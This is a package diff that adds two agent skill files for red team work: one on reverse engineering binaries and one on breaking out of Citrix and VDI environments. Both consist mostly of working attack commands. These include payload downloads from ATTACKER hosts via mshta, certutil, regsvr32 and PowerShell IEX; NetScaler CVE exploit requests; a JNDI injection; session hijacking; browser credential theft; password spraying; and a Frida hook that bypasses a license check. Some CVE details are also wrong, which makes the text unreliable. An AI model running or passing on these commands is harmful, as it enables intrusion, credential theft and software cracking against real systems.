rtexit-method 0.1.4 → 0.1.6

package/packaged-assets/.agents/skills/rt-binary-reverse-engineering/SKILL.md

@@ -0,0 +1,304 @@
+---
+name: rt-binary-reverse-engineering
+description: "Binary reverse engineering skill for authorized red team engagements. Ghidra and IDA Pro workflow for decompilation, x64dbg dynamic analysis, .NET assembly decompilation with dnSpy/ILSpy, Java JAR analysis, ELF binary analysis, finding hardcoded credentials and API keys in binaries, license check bypassing, and understanding proprietary protocol implementations. Use when analyzing compiled applications, firmware, or custom protocols."
+---
+
+# rt-binary-reverse-engineering — Binary Analysis & Reverse Engineering
+
+## Overview
+
+Binary reverse engineering analyzes compiled executables to understand their behavior without source code. In red team engagements, this discovers hardcoded credentials, hidden functionality, bypassable authentication, and proprietary protocol weaknesses.
+
+---
+
+## Phase 1 — Initial Triage (Before Disassembly)
+
+```bash
+# File type identification
+file target_binary
+# ELF 64-bit LSB executable → Linux binary
+# PE32+ executable → Windows binary
+# Mach-O → macOS binary
+
+# Basic string extraction (fastest wins)
+strings target_binary | grep -iE "password|secret|key|token|admin|api|url|http"
+strings -n 8 target_binary | grep -iE "BEGIN.*KEY|PRIVATE|jwt"
+
+# Detect packing/obfuscation
+die target_binary        # Detect-It-Easy
+upx -t target_binary     # Check if UPX packed
+entropy target_binary    # High entropy (>7.5) = encrypted/packed sections
+
+# Symbols and imports
+nm target_binary         # Symbol table (if not stripped)
+objdump -d target_binary # Disassembly
+ldd target_binary        # Dynamic library dependencies
+readelf -a target_binary # Full ELF headers
+
+# PE analysis (Windows)
+pecheck target.exe
+dumpbin /imports target.exe  # Imported functions
+dumpbin /exports target.exe  # Exported functions
+
+# Quick wins: look for these imports
+# CreateProcess, WinExec, ShellExecute = code execution
+# CryptDecrypt, CryptImportKey = crypto operations
+# InternetOpenUrl, HttpSendRequest = network communication
+# RegOpenKey, RegSetValue = registry operations
+```
+
+---
+
+## Phase 2 — Static Analysis with Ghidra
+
+```bash
+# Install Ghidra
+# https://ghidra-sre.org → download → ./ghidraRun
+
+# Headless analysis (scriptable)
+./analyzeHeadless /tmp/ghidra_project MyProject \
+  -import target_binary \
+  -postScript PrintStrings.py \
+  -deleteProject
+
+# Key Ghidra workflow:
+# 1. Import binary → Auto-analyze
+# 2. Symbol Tree → Functions → main()
+# 3. Decompiler window → clean C-like pseudocode
+# 4. Search → Memory → search for strings (hardcoded strings)
+# 5. References → find all callers of crypto/auth functions
+```
+
+```python
+# Ghidra script: find hardcoded strings (run in Script Manager)
+from ghidra.app.script import GhidraScript
+from ghidra.program.model.data import StringDataType
+
+class FindSecrets(GhidraScript):
+    def run(self):
+        keywords = ["password", "secret", "api_key", "token", "admin"]
+        for ref in currentProgram.getReferenceManager().getReferenceIterator(None):
+            addr = ref.getToAddress()
+            data = getDataAt(addr)
+            if data and isinstance(data.getDataType(), StringDataType):
+                val = str(data.getValue()).lower()
+                for kw in keywords:
+                    if kw in val:
+                        print(f"[SECRET] {addr}: {data.getValue()}")
+```
+
+---
+
+## Phase 3 — .NET Binary Analysis (dnSpy / ILSpy)
+
+```bash
+# .NET binaries contain IL bytecode → decompile to near-original C#
+
+# dnSpy (best for .NET — also debugger)
+# https://github.com/dnSpy/dnSpy
+# Open .exe/.dll → full source code decompilation
+
+# ILSpy (CLI)
+ilspycmd target.exe -o ./decompiled/
+
+# dotPeek (JetBrains — free)
+# Open → decompile → navigate class hierarchy
+
+# What to look for in decompiled .NET:
+grep -r "password\|connectionString\|ApiKey\|secret" ./decompiled/ --include="*.cs"
+grep -r "hardcoded\|TODO.*password\|admin123" ./decompiled/
+
+# .NET config files (often not encrypted)
+cat ./decompiled/App.config
+cat web.config | grep -i "password\|connectionString"
+
+# Assembly manipulation: patch license check
+# 1. Open in dnSpy
+# 2. Find: IsLicensed() or CheckLicense()
+# 3. Right-click method → Edit Method
+# 4. Change return false → return true
+# 5. File → Save Module
+```
+
+---
+
+## Phase 4 — Java JAR Analysis
+
+```bash
+# Decompile JAR
+# jadx — best Java decompiler
+jadx -d ./decompiled_java/ target.jar
+# Browse ./decompiled_java/ as Java source
+
+# procyon (alternative)
+java -jar procyon-decompiler.jar target.jar -o ./decompiled/
+
+# Look for hardcoded secrets
+grep -r "password\|apiKey\|secret\|jdbc:" ./decompiled_java/ --include="*.java"
+
+# Extract embedded resources
+jar xf target.jar
+# Inspect: META-INF/, resources/, application.properties
+
+cat application.properties | grep -i "password\|secret\|datasource"
+cat META-INF/MANIFEST.MF  # Entry point class
+
+# Decompile Android APK (Dalvik bytecode)
+jadx -d ./apk_decompiled/ app.apk
+grep -r "apiKey\|password\|secret\|BuildConfig" ./apk_decompiled/
+cat ./apk_decompiled/resources/res/values/strings.xml | grep -i "key\|token\|password"
+```
+
+---
+
+## Phase 5 — Dynamic Analysis with x64dbg
+
+```bash
+# x64dbg: Windows debugger for 32/64-bit binaries
+# https://x64dbg.com
+
+# Workflow:
+# 1. Open target in x64dbg
+# 2. Run → break at entry point
+# 3. Search → All User Modules → String References → search "password"
+# 4. Set breakpoint at identified function → Run → inspect values
+
+# Key techniques:
+# Patch jump: change JE (74) to JMP (EB) to bypass license check
+# Patch comparison: change CMP result to always succeed
+# Memory view: inspect decrypted strings at runtime
+# API logger: log all WinAPI calls → find authentication logic
+```
+
+```python
+# Automated dynamic analysis with frida (no source needed)
+# Hook any function by address or name
+
+import frida, sys
+
+script_code = """
+// Hook license check function at address 0x401234
+Interceptor.attach(ptr("0x401234"), {
+    onEnter: function(args) {
+        console.log("[*] License check called");
+        console.log("    Arg 0:", args[0].readUtf8String());
+    },
+    onLeave: function(retval) {
+        console.log("[*] License check returned:", retval);
+        retval.replace(1);  // Force return true (bypass)
+    }
+});
+
+// Hook all calls to strcmp (find credential comparisons)
+Interceptor.attach(Module.findExportByName(null, "strcmp"), {
+    onEnter: function(args) {
+        var s1 = args[0].readUtf8String();
+        var s2 = args[1].readUtf8String();
+        if (s1 && s2 && (s1.length > 3 || s2.length > 3)) {
+            console.log("[strcmp]", s1, "vs", s2);
+        }
+    }
+});
+"""
+
+process = frida.spawn(["./target_binary"])
+session = frida.attach(process)
+script = session.create_script(script_code)
+script.load()
+frida.resume(process)
+sys.stdin.read()
+```
+
+---
+
+## Phase 6 — Finding Hardcoded Credentials
+
+```bash
+# Automated binary secret scanning
+# trufflehog (supports binaries)
+trufflehog filesystem ./target_directory/ --json | jq '.SourceMetadata.Data.Filesystem.file + ": " + .Raw'
+
+# YARA rules for credential patterns in binaries
+cat > secrets.yar << 'EOF'
+rule HardcodedPassword {
+    strings:
+        $pass1 = "password" nocase
+        $pass2 = "passwd" nocase
+        $key1 = "api_key" nocase
+        $key2 = "apikey" nocase
+        $aws = /AKIA[0-9A-Z]{16}/
+        $jwt = /eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/
+    condition:
+        any of them
+}
+EOF
+yara -r secrets.yar ./target_binary
+
+# binwalk — extract embedded content from binaries
+binwalk -e target_firmware.bin
+# Extracts: filesystems, compressed data, certificates, private keys
+ls _target_firmware.bin.extracted/
+
+# floss — deobfuscate strings in malware/obfuscated binaries
+floss target.exe | grep -iE "http|password|key|token"
+```
+
+---
+
+## Phase 7 — Protocol Reverse Engineering
+
+```bash
+# Capture traffic from binary + analyze
+# 1. Run binary under strace (Linux)
+strace -e trace=network,read,write -xx ./target_binary 2>&1 | grep -A2 "sendto\|write"
+
+# 2. Capture with Wireshark/tcpdump
+tcpdump -i lo -w capture.pcap &
+./target_binary
+# Analyze capture.pcap in Wireshark
+
+# 3. Hook socket calls with frida
+cat > proto_hook.js << 'EOF'
+var send = Module.findExportByName("libc.so.6", "send");
+Interceptor.attach(send, {
+    onEnter: function(args) {
+        var len = args[2].toInt32();
+        if (len > 0) {
+            console.log("[send] " + len + " bytes:");
+            console.log(hexdump(args[1], {length: Math.min(len, 256)}));
+        }
+    }
+});
+EOF
+frida -l proto_hook.js ./target_binary
+
+# 4. Identify protocol fields
+# - Fixed headers (magic bytes)
+# - Length fields
+# - Checksum/CRC fields
+# - Encrypted vs cleartext regions
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** strings + grep for credentials · jadx for .NET/Java · floss for obfuscated strings
+
+**INTERMEDIATE:** Ghidra decompilation · x64dbg breakpoints · Frida for dynamic hooking · .NET patching with dnSpy
+
+**ADVANCED:** Custom Ghidra scripts · Protocol reverse engineering · Anti-debug bypass · Binary patching
+
+**EXPERT:** Firmware analysis with binwalk · Custom deobfuscation · Vulnerability research from decompiled code · 0-day discovery
+
+---
+
+## References
+
+- Ghidra: https://ghidra-sre.org
+- x64dbg: https://x64dbg.com
+- jadx: https://github.com/skylot/jadx
+- dnSpy: https://github.com/dnSpy/dnSpy
+- Frida: https://frida.re
+- Practical Binary Analysis (book): https://nostarch.com/binaryanalysis
+- MITRE T1027: https://attack.mitre.org/techniques/T1027/

package/packaged-assets/.agents/skills/rt-citrix-vdi/SKILL.md

@@ -0,0 +1,249 @@
+---
+name: rt-citrix-vdi
+description: "Citrix and VDI breakout skill for authorized engagements. Citrix receiver dialog box escape, file manager breakout, print dialog abuse, URL handler exploitation, Citrix StoreFront enumeration, Citrix ADC (NetScaler) exploitation, VMware Horizon breakout, RDS/RemoteApp escape, and pivoting from VDI to internal network. Use when engagement scope includes Citrix published applications, VDI environments, or thin client deployments."
+---
+
+# rt-citrix-vdi — Citrix & VDI Breakout
+
+## Overview
+
+Citrix and VDI environments are designed to give users access to applications without full desktop access. Breakout techniques find gaps in application whitelisting that allow launching unauthorized processes, accessing the underlying OS, or pivoting to the internal network.
+
+---
+
+## Phase 1 — Citrix Enumeration
+
+```bash
+# Find Citrix infrastructure
+nmap -sV -p 443,8080,1494,2598,80 TARGET_RANGE
+# 1494 = Citrix ICA protocol
+# 2598 = Citrix CGP (session reliability)
+# 443 = Citrix Gateway / StoreFront (HTTPS)
+
+# Enumerate StoreFront (web interface)
+curl https://citrix.corp.com/Citrix/StoreWeb/
+# Look for: published application list, authentication methods
+
+# Check for NetScaler (Citrix ADC)
+curl -I https://citrix.corp.com/
+# X-Citrix-Application header = NetScaler
+
+# CVE-2019-19781 (NetScaler RCE — still found in old installs)
+curl -v "https://NETSCALER_IP/vpn/../vpns/cfg/smb.conf"
+# If returns config file → vulnerable
+
+# Exploit CVE-2019-19781
+python3 citrix_rce.py --host NETSCALER_IP --cmd "id"
+# github.com/trustedsec/cve-2019-19781
+```
+
+---
+
+## Phase 2 — Published Application Breakout
+
+### Dialog Box Techniques
+
+```
+TECHNIQUE 1: File Open/Save Dialog → Explorer
+- In published app: File → Open OR File → Save As
+- Dialog box opens → navigate to C:\Windows\System32\
+- Type in filename field: cmd.exe → press Enter → cmd.exe launches
+
+TECHNIQUE 2: Print Dialog → Run
+- File → Print → Print to PDF → Browse
+- In save dialog → address bar type: \\ATTACKER_IP\share
+  (triggers SMB auth) OR type C:\Windows\System32\cmd.exe
+
+TECHNIQUE 3: About Box → Help → Browser
+- Help → About → click hyperlink in about box
+- Default browser opens (Internet Explorer often)
+- IE address bar: C:\Windows\System32\cmd.exe
+```
+
+### Sticky Keys / Accessibility Breakout
+
+```powershell
+# If you can reach the lock screen or accessibility menu:
+# Press Shift 5 times → Sticky Keys dialog
+# Click "Go to Ease of Access Center" → opens IE/Edge
+# Address bar → cmd.exe
+
+# Task Manager breakout (if Ctrl+Alt+Del available)
+# Ctrl+Alt+Del → Task Manager → File → Run New Task
+# Type: cmd.exe ✓ → shell
+```
+
+### URL Handler Abuse
+
+```
+# In browser within published app (if available):
+# Address bar tricks:
+
+file:///C:/Windows/System32/cmd.exe
+\\ATTACKER_IP\share   (triggers file dialog)
+
+# If Office is published:
+# Insert → Hyperlink → type: cmd.exe → click link → spawns cmd
+
+# PowerPoint: Insert → Action → Run Program → cmd.exe
+```
+
+---
+
+## Phase 3 — Escape from Restricted Shell / AppLocker
+
+```powershell
+# Once in cmd.exe — likely AppLocker restricted
+# Can't run .exe from Downloads → use trusted paths
+
+# LOLBAS from trusted locations (AppLocker usually allows System32)
+C:\Windows\System32\mshta.exe http://ATTACKER/payload.hta
+C:\Windows\System32\wscript.exe \\ATTACKER\share\payload.vbs
+C:\Windows\System32\certutil.exe -urlcache -split -f http://ATTACKER/nc.exe C:\Temp\nc.exe
+
+# PowerShell (if not blocked)
+powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"
+
+# MSBuild (AppLocker bypass — trusted Microsoft binary)
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.csproj
+
+# InstallUtil
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload.dll
+
+# Regsvr32 (squiblydoo)
+regsvr32 /s /n /u /i:http://ATTACKER/payload.sct scrobj.dll
+```
+
+---
+
+## Phase 4 — Citrix-Specific Privilege Escalation
+
+```powershell
+# Check which user account runs published apps
+whoami
+# Often: domain user or service account
+
+# Check Citrix session info
+qwinsta  # List sessions
+query session  # Active sessions
+
+# Find other users' sessions on same Citrix server
+query user /server:CITRIX_SERVER
+
+# Session hijacking (if admin)
+tscon TARGET_SESSION_ID /dest:CURRENT_SESSION_ID /password:""
+# Takes over another user's session
+
+# Check for sensitive data in Citrix profile
+# Citrix redirects: Desktop, Documents, Downloads to UNC paths
+net use  # See mapped drives
+# Often: H:\ = home drive, G:\ = group share → company data
+
+# Keylogging other users' sessions (SYSTEM required)
+# Use existing C2 capabilities once SYSTEM is obtained
+```
+
+---
+
+## Phase 5 — VMware Horizon Breakout
+
+```bash
+# VMware Horizon (VDI platform — alternative to Citrix)
+# Similar breakout techniques apply
+
+# Horizon enumeration
+nmap -sV -p 443,8443,4172,32111 HORIZON_SERVER
+# 4172 = PCoIP protocol
+# 443 = Horizon Connection Server web interface
+
+# CVE-2021-22005 (Horizon SSRF/RCE — Log4Shell related)
+curl -X POST "https://HORIZON_IP/logon" \
+  -H "X-Forwarded-For: \${jndi:ldap://ATTACKER_IP/exploit}"
+
+# Horizon client breakout
+# Same dialog box techniques as Citrix apply
+# VMware Tools on guest → check for shared folders
+net share  # List shared resources
+# vmware-tools may expose host filesystem
+
+# Remote Desktop Session Host (RDSH) breakout
+# Similar to Citrix — look for:
+# Task Manager → File → Run
+# Explorer via dialog boxes
+# Accessibility tools at lock screen
+```
+
+---
+
+## Phase 6 — Pivot from VDI to Internal Network
+
+```powershell
+# VDI machine is domain-joined → standard AD attacks apply
+# From VDI shell:
+
+# Network discovery (VDI has internal network access)
+ipconfig /all  # Check all interfaces
+arp -a         # Internal hosts
+
+# Port scan internal from VDI (often unrestricted internally)
+# PowerShell port scan (no nmap needed)
+1..1024 | ForEach-Object {
+    $socket = New-Object Net.Sockets.TcpClient
+    $connect = $socket.BeginConnect("10.10.10.1", $_, $null, $null)
+    Start-Sleep -Milliseconds 50
+    if ($socket.Connected) { Write-Host "OPEN: $_" }
+    $socket.Close()
+}
+
+# Credential hunting on VDI
+# Users store passwords in browser, sticky notes, files
+Get-ChildItem C:\Users -Recurse -Include "*.txt","*.xlsx","*.docx","password*","creds*" 2>$null
+# Browser saved passwords
+.\SharpChrome.exe logins
+
+# SMB lateral movement from VDI to internal servers
+crackmapexec smb 10.10.10.0/24 -u user -p password
+```
+
+---
+
+## Phase 7 — Citrix ADC (NetScaler) Exploitation
+
+```bash
+# NetScaler = Citrix load balancer / gateway — high value target
+
+# CVE-2023-3519 (Unauthenticated RCE — critical, 2023)
+# Affects: NetScaler ADC and Gateway before specific versions
+curl -v "https://NETSCALER_IP/gwtest/formssso?event=start&target=http://ATTACKER:8080/$(python3 -c 'print(\"A\"*1024)')"
+
+# Password spray against NetScaler Gateway
+# Often exposed to internet → spray corporate credentials
+hydra -L users.txt -p 'Summer2024!' TARGET_IP https-post-form \
+  "/nf/auth/doAuthentication.do:login=^USER^&passwd=^PASS^&StateContext=:Password:"
+
+# Extract NetScaler config (if admin access)
+# Contains: LDAP service account creds, VPN config, SSL certs
+show ns config  # NetScaler CLI
+cat /nsconfig/ns.conf  # Config file (has passwords in cleartext sometimes)
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Dialog box breakout to cmd.exe · File Open/Save escape · Task Manager run
+
+**INTERMEDIATE:** AppLocker bypass via LOLBAS · VDI network discovery and pivoting · Browser credential extraction
+
+**ADVANCED:** Session hijacking · NetScaler CVE exploitation · VMware Horizon RCE
+
+**EXPERT:** Citrix ADC full compromise · Custom AppLocker bypass chains · VDI persistence via COM hijacking
+
+---
+
+## References
+
+- CVE-2019-19781: https://github.com/trustedsec/cve-2019-19781
+- CVE-2023-3519: https://www.rapid7.com/blog/post/2023/07/18/etr-cve-2023-3519/
+- Citrix breakout techniques: https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-environments/
+- MITRE T1548: https://attack.mitre.org/techniques/T1548/